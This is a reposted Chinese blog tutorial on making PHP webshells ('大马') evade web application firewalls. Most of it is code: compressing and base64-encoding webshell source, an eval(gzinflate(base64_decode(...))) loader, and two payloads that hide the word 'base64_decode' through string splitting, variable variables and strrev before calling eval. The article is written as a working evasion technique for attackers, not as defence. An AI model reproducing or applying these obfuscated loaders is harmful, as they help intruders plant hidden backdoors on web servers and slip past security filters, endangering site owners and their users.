tofacebook.com -专业IT技术社区 【百家号】脸书百科,php大马免杀技巧 | bypass waf Web程序 - tofacebook.com-专业IT技术社区
82°

【百家号】脸书百科,php大马免杀技巧 | bypass waf Web程序

标签:脚本加密   类型   直接   就是   bubuko   decode   encode   echo   技巧   

Part 1 前言

  技术分享图片

 

Part 2 免杀

  执行代码

eval 或 preg_replace的/e修饰符来执行大马代码。

 

 

   技术分享图片

$a = ‘phpinfo();‘;
eval($a);
//eval执行php代码

 

  编码

如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。

 

技术分享图片

 

eval_gzinflate_base64类型加密与解密:

http://www.zhuisu.net/tool/phpencode.php

https://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php

 

自己写脚本加密:

$code= file_get_contents(‘D:\phpStudy\WWW\Test\Zlib\help.txt‘); //大马源码路径
$encode = base64_encode(gzdeflate($code));  //加密函数自己修改就行
echo $encode; //输出加密后代码

 

  解码

通过解码执行我们的代码。

 

  技术分享图片

 

  技术分享图片

<?php                         //加密的代码
eval(gzinflate(base64_decode(‘S03OyFdQ8shUKLbMTVOyBgA=‘)));
?>

 

  关键字免杀

// 类型这样的关键字如果没有混淆拆分是过不了waf的
eval(gzinflate(base64_decode

// 我们需要做的就是关键字免杀

 

  免杀 payload

<?php
$l=‘baSe6‘;
$o=‘4_dE‘;
$v=‘cO‘;
$e=‘DE‘;
$love=$l.$o.$v.$e;
$c = "love";
$a=$$c(‘源码base64加密‘);
eval($a);
?>

<?php
$a = strrev(‘EdOcEd_46eSaB‘); 
$b= $a(‘源码base64加密‘);
eval($b);
?>

 

 

 

 

 

  

  

php大马免杀技巧 | bypass waf

标签:脚本加密   类型   直接   就是   bubuko   decode   encode   echo   技巧   

原文地址:https://www.cnblogs.com/s0mf/p/9373471.html


本文由百家号/熊掌号作者上传并发布,百家号仅提供信息发布平台。文章仅代表作者个人观点,不代表百度立场。

已有 0 条评论

    我有话说: